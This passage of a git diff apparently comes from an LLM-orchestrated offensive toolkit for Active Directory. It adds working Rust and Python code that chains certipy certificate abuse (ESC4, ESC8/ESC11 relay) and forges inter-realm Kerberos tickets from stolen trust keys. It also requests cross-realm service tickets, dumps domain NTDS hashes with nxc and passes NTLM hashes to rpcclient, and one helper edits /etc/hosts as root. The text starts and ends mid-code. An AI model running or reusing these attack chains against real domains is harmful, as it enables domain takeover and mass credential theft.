.flag("-dc-ip", dc_ip) + .flag("-out", &out_name); + let mut step4 = step4; + if let Some(t) = &target { + step4 = step4.flag("-target", *t); + } + let step4_out = step4.timeout_secs(120).execute().await?; + outputs.push(("Retrieve Cert", step4_out)); + + // Step 4b: If certipy couldn't create a PFX (key mismatch), combine manually + let pfx_path = format!("{out_name}.pfx"); + let crt_path = format!("{out_name}.crt"); + let key_path = format!("{out_name}.key"); + if !tokio::fs::try_exists(&pfx_path).await.unwrap_or(false) + && tokio::fs::try_exists(&crt_path).await.unwrap_or(false) + && tokio::fs::try_exists(&key_path).await.unwrap_or(false) + { + let combine = CommandBuilder::new("openssl") + .arg("pkcs12") + .flag("-in", &crt_path) + .flag("-inkey", &key_path) + .arg("-export") + .flag("-out", &pfx_path) + .flag("-passout", "pass:") + .timeout_secs(30) + .execute() + .await?; + outputs.push(("Combine PFX", combine)); + } + + // Step 5: Authenticate with the retrieved PFX + let _ = tokio::process::Command::new("sh") + .arg("-c") + .arg("rm -f *.ccache 2>/dev/null") + .output() + .await; + + let step5 = CommandBuilder::new("certipy") + .arg("auth") + .flag("-pfx", &pfx_path) + .flag("-dc-ip", dc_ip) + .flag("-domain", domain) + .timeout_secs(120) + .execute() + .await?; + let auth_success = step5.success; + outputs.push(("Authenticate", step5)); + + let combined_stdout = outputs + .iter() + .map(|(name, o)| format!("=== Step: {name} ===\n{}", o.stdout)) + .collect::>() + .join("\n"); + let combined_stderr = outputs + .iter() + .map(|(name, o)| format!("=== Step: {name} ===\n{}", o.stderr)) + .collect::>() + .join("\n"); + + Ok(ToolOutput { + stdout: combined_stdout, + stderr: combined_stderr, + exit_code: if auth_success { Some(0) } else { Some(1) }, + success: auth_success, + }) +} + +/// Start a Certipy relay listener for ESC8 (HTTP) or ESC11 (RPC) attacks. +/// +/// Required args: `target`, `ca` +/// Optional args: `template` +/// +/// For ESC8: `certipy relay -target http://ca-host -ca CA-NAME` +/// For ESC11: `certipy relay -target rpc://ca-host -ca CA-NAME` +pub async fn certipy_relay(args: &Value) -> Result { + let target = required_str(args, "target")?; + let ca = required_str(args, "ca")?; + let template = optional_str(args, "template"); + + CommandBuilder::new("certipy") + .arg("relay") + .flag("-target", target) + .flag("-ca", ca) + .flag_opt("-template", template) + .timeout_secs(300) + .execute() + .await +} + /// Modify a certificate template for ESC4 exploitation using Certipy. /// /// Required args: `username`, `domain`, `password`, `template`, `dc_ip` @@ -130,12 +529,34 @@ pub async fn certipy_template_esc4(args: &Value) -> Result { /// request -> authentication. /// /// Required args: `username`, `domain`, `password`, `template`, `dc_ip`, -/// `ca`, `pfx_path` -/// Optional args: `upn` +/// `ca` +/// Optional args: `upn`, `target`, `sid` pub async fn certipy_esc4_full_chain(args: &Value) -> Result { let template_output = certipy_template_esc4(args).await?; - let request_output = certipy_request(args).await?; - let auth_output = certipy_auth(args).await?; + + // Generate a unique output name for the PFX and inject into args + let template = args + .get("template") + .and_then(|v| v.as_str()) + .unwrap_or("esc4"); + let ts = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| d.as_millis()) + .unwrap_or(0); + let out_name = format!("cert_{template}_{ts}"); + let pfx_path = format!("{out_name}.pfx"); + + let mut req_args = args.clone(); + if let Some(obj) = req_args.as_object_mut() { + obj.insert("out".into(), serde_json::json!(out_name)); + } + let request_output = certipy_request(&req_args).await?; + + let mut auth_args = args.clone(); + if let Some(obj) = auth_args.as_object_mut() { + obj.insert("pfx_path".into(), serde_json::json!(pfx_path)); + } + let auth_output = certipy_auth(&auth_args).await?; let combined_stdout = format!( "=== Step 1: Template Modification ===\n{}\n\ @@ -164,6 +585,8 @@ mod tests { use crate::args::{optional_bool, optional_str, required_str}; use serde_json::json; + // --- certipy_find --- + #[test] fn certipy_find_missing_username() { let args = json!({ @@ -243,6 +666,8 @@ mod tests { assert!(vulnerable); } + // --- certipy_request --- + #[test] fn certipy_request_missing_ca() { let args = json!({ @@ -313,6 +738,8 @@ mod tests { assert!(optional_str(&args, "upn").is_none()); } + // --- certipy_auth --- + #[test] fn certipy_auth_missing_pfx_path() { let args = json!({ @@ -352,6 +779,8 @@ mod tests { assert_eq!(required_str(&args, "domain").unwrap(), "contoso.local"); } + // --- certipy_shadow --- + #[test] fn certipy_shadow_missing_target() { let args = json!({ @@ -378,6 +807,8 @@ mod tests { assert_eq!(user_at_domain, "admin@contoso.local"); } + // --- certipy_template_esc4 --- + #[test] fn certipy_template_esc4_missing_template() { let args = json!({ @@ -404,6 +835,8 @@ mod tests { assert_eq!(user_at_domain, "admin@contoso.local"); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] @@ -478,6 +911,27 @@ mod tests { assert!(super::certipy_template_esc4(&args).await.is_ok()); } + #[tokio::test] + async fn certipy_relay_executes() { + mock::push(mock::success()); + let args = json!({ + "target": "rpc://192.168.58.10", "ca": "contoso-CA" + }); + assert!(super::certipy_relay(&args).await.is_ok()); + } + + #[tokio::test] + async fn certipy_request_with_application_policies_executes() { + mock::push(mock::success()); + let args = json!({ + "username": "admin", "domain": "contoso.local", + "password": "P@ss", "ca": "contoso-CA", "template": "ESC15", + "dc_ip": "192.168.58.1", + "application_policies": "1.3.6.1.5.5.7.3.2" + }); + assert!(super::certipy_request(&args).await.is_ok()); + } + #[tokio::test] async fn certipy_esc4_full_chain_executes() { // 3 execute calls: template, request, auth diff --git a/ares-tools/src/privesc/cross_realm_tgs.py b/ares-tools/src/privesc/cross_realm_tgs.py new file mode 100644 index 00000000..5cbcd05e --- /dev/null +++ b/ares-tools/src/privesc/cross_realm_tgs.py @@ -0,0 +1,76 @@ +#!/usr/bin/env python3 +"""Request a TGS using a cross-realm (inter-realm) TGT. + +Workaround for impacket #315: getST/SMB cross-realm referral is broken because +``CCache.parseFile`` and ``getST.run`` only look up ``krbtgt/@`` +(a regular intra-realm TGT) when ``-k -no-pass`` is given. A forged inter-realm +TGT has server ``krbtgt/@``, so it is silently ignored and +getST falls through to a no-pass authentication that fails with +``KDC_ERR_WRONG_REALM`` (and exit 0, hiding the failure). + +This helper loads the cross-realm TGT directly out of the input ccache, calls +``getKerberosTGS`` against the target realm's KDC, and writes the resulting TGS +to a new ccache that ``nxc`` / ``secretsdump`` consume via ``KRB5CCNAME``. +""" + +import argparse +import sys + +from impacket.krb5 import constants +from impacket.krb5.ccache import CCache +from impacket.krb5.kerberosv5 import getKerberosTGS +from impacket.krb5.types import Principal + + +def main() -> int: + p = argparse.ArgumentParser() + p.add_argument("--in-ccache", required=True, help="ccache containing the cross-realm TGT") + p.add_argument("--out-ccache", required=True, help="ccache to write resulting TGS to") + p.add_argument("--spn", required=True, help="service SPN, e.g. cifs/dc.target.local") + p.add_argument("--source-realm", required=True, help="realm where the TGT was issued") + p.add_argument("--target-realm", required=True, help="realm of the SPN") + p.add_argument("--target-kdc", required=True, help="target realm KDC IP/host to send TGS-REQ to") + args = p.parse_args() + + src_realm = args.source_realm.upper() + tgt_realm = args.target_realm.upper() + + in_cc = CCache.loadFile(args.in_ccache) + if in_cc is None: + print(f"[!] failed to load {args.in_ccache}", file=sys.stderr) + return 2 + + cross_principal = f"krbtgt/{tgt_realm}@{src_realm}" + creds = in_cc.getCredential(cross_principal, anySPN=False) + if creds is None: + print(f"[!] no cross-realm TGT for {cross_principal} in {args.in_ccache}", file=sys.stderr) + return 3 + + tgt = creds.toTGT() + server = Principal(args.spn, type=constants.PrincipalNameType.NT_SRV_INST.value) + + print( + f"[*] requesting TGS for {args.spn} from {args.target_kdc} ({tgt_realm})", + file=sys.stderr, + ) + # getKerberosTGS returns (tgs_rep, cipher, tgt_session_key, new_session_key). + # tgt_session_key decrypts the TGS-REP enc-part (key usage 8); new_session_key + # is the application key inside the TGS. fromTGS expects (tgs, oldKey, newKey). + tgs, _cipher, tgt_session_key, new_session_key = getKerberosTGS( + server, + tgt_realm, + args.target_kdc, + tgt["KDC_REP"], + tgt["cipher"], + tgt["sessionKey"], + ) + + out = CCache() + out.fromTGS(tgs, tgt_session_key, new_session_key) + out.saveFile(args.out_ccache) + print(f"[+] wrote TGS to {args.out_ccache}", file=sys.stderr) + return 0 + + +if __name__ == "__main__": + sys.exit(main()) diff --git a/ares-tools/src/privesc/cve_exploits.rs b/ares-tools/src/privesc/cve_exploits.rs index 050d125d..351c0f86 100644 --- a/ares-tools/src/privesc/cve_exploits.rs +++ b/ares-tools/src/privesc/cve_exploits.rs @@ -74,6 +74,8 @@ mod tests { use crate::args::{optional_bool, optional_str, required_str}; use serde_json::json; + // --- nopac --- + #[test] fn nopac_missing_domain() { let args = json!({ @@ -177,6 +179,8 @@ mod tests { assert!(shell); } + // --- printnightmare --- + #[test] fn printnightmare_missing_target() { let args = json!({ @@ -216,6 +220,8 @@ mod tests { assert_eq!(creds, "contoso.local/admin:P@ssw0rd!@dc01.contoso.local"); } + // --- petitpotam_unauth --- + #[test] fn petitpotam_unauth_missing_listener() { let args = json!({ @@ -242,6 +248,8 @@ mod tests { assert_eq!(required_str(&args, "target").unwrap(), "dc01.contoso.local"); } + // --- mock executor tests --- + use super::*; use crate::executor::mock; diff --git a/ares-tools/src/privesc/delegation.rs b/ares-tools/src/privesc/delegation.rs index b2ac80f9..2bcce482 100644 --- a/ares-tools/src/privesc/delegation.rs +++ b/ares-tools/src/privesc/delegation.rs @@ -81,9 +81,12 @@ pub async fn generate_golden_ticket(args: &Value) -> Result { let domain = required_str(args, "domain")?; let extra_sid = optional_str(args, "extra_sid"); let username = optional_str(args, "username").unwrap_or("Administrator"); + // -nthash expects a 32-char NT hash; strip any LM half if the LLM + // passed a `LM:NT` concatenated form. + let nt = credentials::nt_hash_only(krbtgt_hash); CommandBuilder::new("impacket-ticketer") - .flag("-nthash", krbtgt_hash) + .flag("-nthash", nt) .flag("-domain-sid", domain_sid) .flag("-domain", domain) .flag_opt("-extra-sid", extra_sid) @@ -196,13 +199,18 @@ pub async fn krbrelayup(args: &Value) -> Result { /// /// Required args: `child_domain`, `username` /// Auth: `password` (plaintext) OR `hash` (NTLM pass-the-hash). At least one required. -/// Optional args: `target_domain` +/// +/// raiseChild auto-discovers the parent forest root via the child DC's +/// trustedDomain LDAP objects, so callers don't need to supply parent FQDN +/// or DC IPs. The script accepts only the positional `domain/user[:pass]` +/// plus `-hashes`, `-w`, `-target-exec`, `-targetRID`, `-k`, `-aesKey`, +/// `-no-pass`. Passing `-dc-ip` / `-target-ip` / `-target-domain` makes +/// argparse exit 2. pub async fn raise_child(args: &Value) -> Result { let child_domain = required_str(args, "child_domain")?; let username = required_str(args, "username")?; let password = optional_str(args, "password"); let hash = optional_str(args, "hash"); - let target_domain = optional_str(args, "target_domain"); if password.is_none() && hash.is_none() { anyhow::bail!("raise_child requires either 'password' or 'hash' for authentication"); @@ -218,8 +226,6 @@ pub async fn raise_child(args: &Value) -> Result { cmd = cmd.arg(format!("{child_domain}/{username}:{p}")); } - cmd = cmd.flag_opt("-target-domain", target_domain); - // raiseChild performs multiple secretsdumps internally — needs extra time cmd.timeout_secs(300).execute().await } @@ -686,6 +692,8 @@ mod tests { assert_eq!(val, "/tmp/admin.ccache"); } + // --- mock executor tests --- + use super::*; use crate::executor::mock; diff --git a/ares-tools/src/privesc/gmsa.rs b/ares-tools/src/privesc/gmsa.rs index f7edfd3c..9250965c 100644 --- a/ares-tools/src/privesc/gmsa.rs +++ b/ares-tools/src/privesc/gmsa.rs @@ -74,6 +74,8 @@ mod tests { use crate::args::{optional_str, required_str}; use serde_json::json; + // --- gmsa_dump_passwords --- + #[test] fn gmsa_dump_passwords_requires_dc_ip() { let args = json!({ @@ -121,6 +123,8 @@ mod tests { assert_eq!(optional_str(&args, "domain"), Some("contoso.local")); } + // --- unconstrained_tgt_dump --- + #[test] fn unconstrained_tgt_dump_missing_domain() { let args = json!({ @@ -178,6 +182,8 @@ mod tests { ); } + // --- unconstrained_coerce_and_capture --- + #[test] fn unconstrained_coerce_missing_coerce_from() { let args = json!({ @@ -217,6 +223,8 @@ mod tests { assert_eq!(creds, "contoso.local/admin:P@ssw0rd!@dc01.contoso.local"); } + // --- mock executor tests --- + use super::*; use crate::executor::mock; diff --git a/ares-tools/src/privesc/trust.rs b/ares-tools/src/privesc/trust.rs index a02dfce1..1f8d5ff9 100644 --- a/ares-tools/src/privesc/trust.rs +++ b/ares-tools/src/privesc/trust.rs @@ -1,6 +1,6 @@ //! Trust / cross-forest tool executors. -use anyhow::Result; +use anyhow::{Context, Result}; use serde_json::Value; use crate::args::{optional_str, required_str}; @@ -8,18 +8,68 @@ use crate::credentials; use crate::executor::CommandBuilder; use crate::ToolOutput; +/// Embedded Python helper that does a cross-realm TGS-REQ using a forged +/// inter-realm TGT. See `forge_inter_realm_and_dump` for why this exists. +const CROSS_REALM_TGS_HELPER: &str = include_str!("cross_realm_tgs.py"); + +/// Idempotently ensure `/etc/hosts` contains an ` ` mapping so +/// callers using FQDNs (Kerberos SPN match) can resolve them on a worker that +/// has no DNS path to the lab forest. Reads the current file, returns Ok if +/// any line already maps the hostname to the given IP, otherwise appends a +/// new entry. The append is racy across concurrent runs but a duplicate line +/// is harmless and `getaddrinfo` returns the first match, so we don't lock. +/// +/// Errors are surfaced — failing to write `/etc/hosts` would leave the caller +/// to silently fail at `nxc` time, which is exactly the symptom we're fixing. +fn ensure_hosts_entry(ip: &str, hostname: &str) -> Result<()> { + use std::io::Write as _; + let path = "/etc/hosts"; + let current = std::fs::read_to_string(path) + .with_context(|| format!("failed to read {path} for hostname mapping"))?; + let needle = format!(" {hostname} "); + let needle_eol = format!(" {hostname}\n"); + for line in current.lines() { + if line.trim_start().starts_with('#') { + continue; + } + let padded = format!(" {line} \n"); + if padded.contains(&needle) || padded.contains(&needle_eol) { + let mut fields = line.split_whitespace(); + if fields.next() == Some(ip) && fields.any(|f| f.eq_ignore_ascii_case(hostname)) { + return Ok(()); + } + } + } + let mut f = std::fs::OpenOptions::new() + .append(true) + .open(path) + .with_context(|| format!("failed to open {path} for hostname mapping"))?; + writeln!(f, "{ip} {hostname}").with_context(|| format!("failed to append to {path}"))?; + Ok(()) +} + /// Extract trust keys by dumping secrets for a trusted domain's machine account. /// -/// Required args: `domain`, `username`, `password`, `dc_ip`, `trusted_domain` +/// Required args: `domain`, `username`, `dc_ip`, `trusted_domain` +/// Auth: `password` (plaintext) OR `hash` (NTLM pass-the-hash). At least one +/// non-empty value required — empty `password` would trigger an interactive +/// `getpass()` prompt inside impacket-secretsdump and EOF the agent's stdin. pub async fn extract_trust_key(args: &Value) -> Result { let domain = required_str(args, "domain")?; let username = required_str(args, "username")?; - let password = required_str(args, "password")?; + let password = optional_str(args, "password").filter(|s| !s.is_empty()); + let hash = optional_str(args, "hash").filter(|s| !s.is_empty()); let dc_ip = required_str(args, "dc_ip")?; let trusted_domain = required_str(args, "trusted_domain")?; + if password.is_none() && hash.is_none() { + anyhow::bail!( + "extract_trust_key requires non-empty 'password' or 'hash' for authentication" + ); + } + let (target_str, extra_args) = - credentials::impacket_auth(Some(domain), username, Some(password), None, dc_ip); + credentials::impacket_auth(Some(domain), username, password, hash, dc_ip); let just_dc_user = format!("{trusted_domain}$"); @@ -36,30 +86,232 @@ pub async fn extract_trust_key(args: &Value) -> Result { /// /// Required args: `trust_key`, `source_sid`, `source_domain`, `target_sid`, /// `target_domain` -/// Optional args: `username` +/// Optional args: `username`, `extra_sid`, `aes_key` +/// +/// For child-to-parent escalation (same forest), pass `extra_sid` with the +/// parent domain Enterprise Admins SID (e.g. `S-1-5-21-…-519`). +/// For cross-forest trusts, omit `extra_sid` — SID filtering blocks RIDs < 1000. +/// +/// When `aes_key` is supplied, the AES256 trust key is used in addition to the +/// NT hash. Win2016+ DCs reject RC4-only inter-realm tickets with +/// `KDC_ERR_TGT_REVOKED`, so the AES path is required for any modern target +/// forest. impacket-ticketer accepts both flags simultaneously and embeds both +/// keys in the ticket so RC4-only and AES-only KDCs both validate. pub async fn create_inter_realm_ticket(args: &Value) -> Result { let trust_key = required_str(args, "trust_key")?; let source_sid = required_str(args, "source_sid")?; let source_domain = required_str(args, "source_domain")?; - let target_sid = required_str(args, "target_sid")?; + let _target_sid = required_str(args, "target_sid")?; let target_domain = required_str(args, "target_domain")?; let username = optional_str(args, "username").unwrap_or("Administrator"); + let extra_sid = optional_str(args, "extra_sid"); + let aes_key = optional_str(args, "aes_key").filter(|s| !s.is_empty()); - let extra_sid = format!("{target_sid}-519"); let spn = format!("krbtgt/{target_domain}"); + // -nthash expects a 32-char hex NT hash. LLMs frequently pass the + // concatenated `LM:NT` form harvested from secretsdump output, which + // ticketer rejects with `'Odd-length string'`. Strip to NT half. + let nt = credentials::nt_hash_only(trust_key); - CommandBuilder::new("impacket-ticketer") - .flag("-nthash", trust_key) + let mut cmd = CommandBuilder::new("impacket-ticketer") + .flag("-nthash", nt) .flag("-domain-sid", source_sid) - .flag("-domain", source_domain) - .flag("-extra-sid", extra_sid) - .flag("-spn", spn) + .flag("-domain", source_domain); + + if let Some(aes) = aes_key { + cmd = cmd.flag("-aesKey", aes); + } + + if let Some(es) = extra_sid { + cmd = cmd.flag("-extra-sid", es); + } + + cmd.flag("-spn", spn) .arg(username) .timeout_secs(120) .execute() .await } +/// Forge an inter-realm Kerberos ticket, request a TGS for the target DC, +/// then run `nxc smb --ntds` against it — all in a single worker invocation. +/// +/// This wraps the impacket forge-and-present workaround for the cross-realm +/// referral bug (fortra/impacket#315) into ONE deterministic tool call so +/// the orchestrator can dispatch every parameter directly, without laundering +/// the trust key / SIDs through an LLM. All three steps share a tempdir as +/// cwd so the ccache files produced are colocated on disk. +/// +/// Why three steps and not two: +/// 1. **ticketer** forges the inter-realm TGT (krbtgt/ issued by +/// ) using the trust key. Forced to **NT-only** — impacket has a +/// salt-derivation bug on trust accounts that yields +/// `KRB_AP_ERR_BAD_INTEGRITY` whenever the AES key is supplied alongside +/// the NT hash. The NT-only ticket validates against modern KDCs. +/// 2. **`cross_realm_tgs.py`** (embedded helper) loads the inter-realm TGT +/// directly and calls `getKerberosTGS` against the target KDC for +/// `cifs/`. We can't use `impacket-getST -k -no-pass` here: +/// impacket's `CCache.parseFile` only matches `krbtgt/@` +/// (intra-realm TGTs) so the inter-realm credential `krbtgt/@` +/// is silently ignored. getST then falls through to no-pass auth that +/// returns `KDC_ERR_WRONG_REALM` with exit code 0, hiding the failure. +/// 3. **nxc smb --ntds** dumps NTDS using the TGS via Kerberos cache. +/// `impacket-secretsdump` is unusable here: its DRSUAPI bind rejects +/// cross-realm TGS auth with `Bind context rejected: invalid_checksum`. +/// netexec's `--ntds vss` path uses a different bind sequence that +/// accepts the cross-realm credential. +/// +/// Required args: `trust_key`, `source_sid`, `source_domain`, `target_domain`, +/// `target` (DC hostname for cifs/ SPN matching) +/// Optional args: `target_sid` (kept for parity), `username` (default +/// "Administrator"), `extra_sid` (child→parent only — omit for +/// cross-forest), `dc_ip` (passed as -dc-ip and to nxc). +pub async fn forge_inter_realm_and_dump(args: &Value) -> Result { + let trust_key = required_str(args, "trust_key")?; + let source_sid = required_str(args, "source_sid")?; + let source_domain = required_str(args, "source_domain")?; + let target_domain = required_str(args, "target_domain")?; + let target = required_str(args, "target")?; + // target_sid currently unused by ticketer but accepted for API parity + // with create_inter_realm_ticket; ticketer derives the realm from -domain. + let _target_sid = optional_str(args, "target_sid"); + let username = optional_str(args, "username") + .unwrap_or("Administrator") + .to_string(); + let extra_sid = optional_str(args, "extra_sid"); + let dc_ip = optional_str(args, "dc_ip"); + + let nt = credentials::nt_hash_only(trust_key); + + let tempdir = tempfile::tempdir().context("failed to create tempdir for inter-realm forge")?; + let cwd = tempdir.path().to_path_buf(); + + // --- Step 1: forge inter-realm TGT (NT-only) --- + let krbtgt_spn = format!("krbtgt/{target_domain}"); + let mut ticketer = CommandBuilder::new("impacket-ticketer") + .flag("-nthash", nt) + .flag("-domain-sid", source_sid) + .flag("-domain", source_domain); + if let Some(es) = extra_sid { + ticketer = ticketer.flag("-extra-sid", es); + } + let ticketer_output = ticketer + .flag("-spn", krbtgt_spn) + .arg(&username) + .current_dir(&cwd) + .timeout_secs(120) + .execute() + .await?; + + if !ticketer_output.success { + return Ok(ticketer_output); + } + + let tgt_ccache = cwd.join(format!("{username}.ccache")); + if !tgt_ccache.exists() { + anyhow::bail!( + "impacket-ticketer reported success but {} was not produced", + tgt_ccache.display() + ); + } + + // --- Step 2: cross-realm TGS via embedded helper --- + // + // Write the helper to the tempdir and invoke it. The helper opens the + // forged inter-realm TGT, calls `getKerberosTGS` directly against the + // target KDC, and writes the resulting TGS to a new ccache. See the + // function docstring above for why we can't use `impacket-getST` here. + let helper_path = cwd.join("cross_realm_tgs.py"); + std::fs::write(&helper_path, CROSS_REALM_TGS_HELPER) + .context("failed to write cross_realm_tgs helper")?; + + let cifs_spn = format!("cifs/{target}"); + let tgs_ccache = cwd.join("cross_realm_tgs.ccache"); + let target_kdc = dc_ip.unwrap_or(target); + + let getst_output = CommandBuilder::new("python3") + .arg(helper_path.to_string_lossy().into_owned()) + .flag("--in-ccache", tgt_ccache.to_string_lossy().into_owned()) + .flag("--out-ccache", tgs_ccache.to_string_lossy().into_owned()) + .flag("--spn", &cifs_spn) + .flag("--source-realm", source_domain.to_uppercase()) + .flag("--target-realm", target_domain.to_uppercase()) + .flag("--target-kdc", target_kdc) + .current_dir(&cwd) + .timeout_secs(120) + .execute() + .await?; + + if !getst_output.success { + return Ok(ToolOutput { + stdout: format!( + "=== impacket-ticketer ===\n{}\n=== cross_realm_tgs ===\n{}", + ticketer_output.stdout, getst_output.stdout + ), + stderr: format!( + "--- ticketer stderr ---\n{}\n--- cross_realm_tgs stderr ---\n{}", + ticketer_output.stderr, getst_output.stderr + ), + exit_code: getst_output.exit_code, + success: false, + }); + } + + if !tgs_ccache.exists() { + anyhow::bail!( + "cross_realm_tgs helper reported success but {} was not produced", + tgs_ccache.display() + ); + } + + // --- Step 3: nxc smb --ntds via the TGS ccache --- + // + // The cached TGS is bound to `cifs/{target}` where `target` is the FQDN + // baked into the ticket by step 2. nxc auto-builds its SPN from the + // command-line target, so we MUST pass the FQDN here — passing the IP + // would make nxc look up `cifs/` in the cache, miss, and silently + // fall through with exit 0 / empty stdout. + // + // FQDN connect requires DNS, but on a stock Kali worker `/etc/resolv.conf` + // points at AWS internal DNS which does not know the lab forest. Without + // a hosts entry the socket-layer lookup fails before nxc can speak SMB, + // and the same silent exit-0 failure mode shows up — masking real auth + // outcomes from the orchestrator's krbtgt-observation check. Append an + // ` ` line to `/etc/hosts` (the worker runs as root) so getaddrinfo + // resolves cleanly. The append is idempotent — duplicate lines are harmless + // and survive concurrent runs without locking. + if let Some(ip) = dc_ip { + ensure_hosts_entry(ip, target)?; + } + let dump_output = CommandBuilder::new("nxc") + .arg("smb") + .arg(target) + .arg("-k") + .arg("--use-kcache") + .arg("--ntds") + .arg("vss") + .env("KRB5CCNAME", tgs_ccache.to_string_lossy().into_owned()) + .current_dir(&cwd) + .timeout_secs(600) + .execute() + .await?; + + let stdout = format!( + "=== impacket-ticketer ===\n{}\n=== cross_realm_tgs ===\n{}\n=== nxc smb --ntds ===\n{}", + ticketer_output.stdout, getst_output.stdout, dump_output.stdout + ); + let stderr = format!( + "--- ticketer stderr ---\n{}\n--- cross_realm_tgs stderr ---\n{}\n--- nxc stderr ---\n{}", + ticketer_output.stderr, getst_output.stderr, dump_output.stderr + ); + Ok(ToolOutput { + stdout, + stderr, + exit_code: dump_output.exit_code, + success: dump_output.success, + }) +} + /// Look up domain SIDs using impacket-lookupsid. /// /// Required args: `domain`, `username`, `dc_ip` @@ -126,6 +378,8 @@ mod tests { use crate::args::{optional_str, required_str}; use serde_json::json; + // --- extract_trust_key --- + #[test] fn extract_trust_key_missing_trusted_domain() { let args = json!({ @@ -162,6 +416,8 @@ mod tests { assert_eq!(just_dc_user, "child.contoso.local$"); } + // --- create_inter_realm_ticket --- + #[test] fn create_inter_realm_ticket_missing_trust_key() { let args = json!({ @@ -185,7 +441,8 @@ mod tests { } #[test] - fn create_inter_realm_ticket_extra_sid_format() { + fn create_inter_realm_ticket_extra_sid_optional() { + // Without extra_sid — cross-forest case let args = json!({ "trust_key": "aabbccdd", "source_sid": "S-1-5-21-111", @@ -193,9 +450,21 @@ mod tests { "target_sid": "S-1-5-21-222", "target_domain": "contoso.local" }); - let target_sid = required_str(&args, "target_sid").unwrap(); - let extra_sid = format!("{target_sid}-519"); - assert_eq!(extra_sid, "S-1-5-21-222-519"); + assert!(optional_str(&args, "extra_sid").is_none()); + } + + #[test] + fn create_inter_realm_ticket_extra_sid_child_to_parent() { + // With extra_sid — child-to-parent case + let args = json!({ + "trust_key": "aabbccdd", + "source_sid": "S-1-5-21-111", + "source_domain": "child.contoso.local", + "target_sid": "S-1-5-21-222", + "target_domain": "contoso.local", + "extra_sid": "S-1-5-21-222-519" + }); + assert_eq!(optional_str(&args, "extra_sid"), Some("S-1-5-21-222-519")); } #[test] @@ -239,6 +508,8 @@ mod tests { assert_eq!(username, "fakeuser"); } + // --- get_sid --- + #[test] fn get_sid_missing_domain() { let args = json!({ @@ -323,6 +594,8 @@ mod tests { assert_eq!(hash, Some("31d6cfe0d16ae931b73c59d7e0c089c0")); } + // --- dnstool --- + #[test] fn dnstool_missing_record_name() { let args = json!({ @@ -392,6 +665,8 @@ mod tests { assert_eq!(user_spec, "contoso.local\\admin"); } + // --- mock executor tests --- + use super::*; use crate::executor::mock; @@ -409,7 +684,7 @@ mod tests { } #[tokio::test] - async fn create_inter_realm_ticket_executes() { + async fn create_inter_realm_ticket_executes_without_extra_sid() { mock::push(mock::success()); let args = json!({ "trust_key": "aabbccdd", @@ -421,6 +696,65 @@ mod tests { assert!(create_inter_realm_ticket(&args).await.is_ok()); } + #[tokio::test] + async fn create_inter_realm_ticket_executes_with_extra_sid() { + mock::push(mock::success()); + let args = json!({ + "trust_key": "aabbccdd", + "source_sid": "S-1-5-21-111", + "source_domain": "child.contoso.local", + "target_sid": "S-1-5-21-222", + "target_domain": "contoso.local", + "extra_sid": "S-1-5-21-222-519" + }); + assert!(create_inter_realm_ticket(&args).await.is_ok()); + } + + // --- forge_inter_realm_and_dump (arg validation only — full flow needs + // real impacket binaries and a tempdir-aware mock executor) --- + + #[test] + fn forge_inter_realm_and_dump_missing_trust_key() { + let args = json!({ + "source_sid": "S-1-5-21-111", + "source_domain": "child.contoso.local", + "target_domain": "contoso.local", + "target": "dc01.contoso.local" + }); + let rt = tokio::runtime::Runtime::new().unwrap(); + let result = rt.block_on(super::forge_inter_realm_and_dump(&args)); + assert!(result.is_err()); + assert!(result.unwrap_err().to_string().contains("trust_key")); + } + + #[test] + fn forge_inter_realm_and_dump_missing_source_sid() { + let args = json!({ + "trust_key": "aabbccdd", + "source_domain": "child.contoso.local", + "target_domain": "contoso.local", + "target": "dc01.contoso.local" + }); + let rt = tokio::runtime::Runtime::new().unwrap(); + let result = rt.block_on(super::forge_inter_realm_and_dump(&args)); + assert!(result.is_err()); + assert!(result.unwrap_err().to_string().contains("source_sid")); + } + + #[test] + fn forge_inter_realm_and_dump_missing_target() { + let args = json!({ + "trust_key": "aabbccdd", + "source_sid": "S-1-5-21-111", + "source_domain": "child.contoso.local", + "target_domain": "contoso.local" + }); + let rt = tokio::runtime::Runtime::new().unwrap(); + let result = rt.block_on(super::forge_inter_realm_and_dump(&args)); + assert!(result.is_err()); + assert!(result.unwrap_err().to_string().contains("target")); + } + #[tokio::test] async fn create_inter_realm_ticket_with_username_executes() { mock::push(mock::success()); diff --git a/ares-tools/src/recon.rs b/ares-tools/src/recon.rs index 1bdf40e9..cfeb326a 100644 --- a/ares-tools/src/recon.rs +++ b/ares-tools/src/recon.rs @@ -269,12 +269,19 @@ pub async fn run_bloodhound(args: &Value) -> Result { /// Run an LDAP search query against a target. /// /// Required args: `target`, `domain` -/// Optional args: `username`, `password`, `base_dn`, `filter`, `attributes` +/// Optional args: `username`, `password`, `bind_domain`, `base_dn`, `filter`, `attributes` +/// +/// `domain` controls the base DN (the partition being queried). +/// `bind_domain` (optional) overrides the domain used in the bind DN +/// (`user@bind_domain`). Use this when authenticating with a credential +/// from a different domain than the one being searched — e.g. querying +/// a parent DC with a child-domain credential. Defaults to `domain`. pub async fn ldap_search(args: &Value) -> Result { let target = required_str(args, "target")?; let domain = required_str(args, "domain")?; let username = optional_str(args, "username"); let password = optional_str(args, "password"); + let bind_domain = optional_str(args, "bind_domain"); let base_dn = optional_str(args, "base_dn"); let filter = optional_str(args, "filter"); let attributes = optional_str(args, "attributes"); @@ -292,7 +299,8 @@ pub async fn ldap_search(args: &Value) -> Result { .timeout_secs(120); if let (Some(u), Some(p)) = (username, password) { - let bind_dn = format!("{u}@{domain}"); + let auth_domain = bind_domain.unwrap_or(domain); + let bind_dn = format!("{u}@{auth_domain}"); cmd = cmd.flag("-D", bind_dn).flag("-w", p); } @@ -317,16 +325,34 @@ pub async fn ldap_search(args: &Value) -> Result { /// Execute an rpcclient command against a target. /// /// Required args: `target`, `command` -/// Optional args: `username`, `password`, `domain`, `null_session` +/// Optional args: `username`, `password`, `domain`, `null_session`, `hash` pub async fn rpcclient_command(args: &Value) -> Result { let target = required_str(args, "target")?; let command = required_str(args, "command")?; let null_session = optional_bool(args, "null_session").unwrap_or(false); + let hash = optional_str(args, "hash"); let mut cmd = CommandBuilder::new("rpcclient").timeout_secs(120); if null_session { cmd = cmd.args(["-U", "", "-N"]); + } else if let Some(ntlm_hash) = hash { + // Pass-the-hash: use --pw-nt-hash and supply the NTLM hash as the password. + // rpcclient --pw-nt-hash expects only the NT hash (32 hex chars), not LM:NT. + // If the hash is in LM:NT format (e.g. "aad3b435...:2e993405..."), extract + // just the NT part (after the colon). + let nt_hash = if 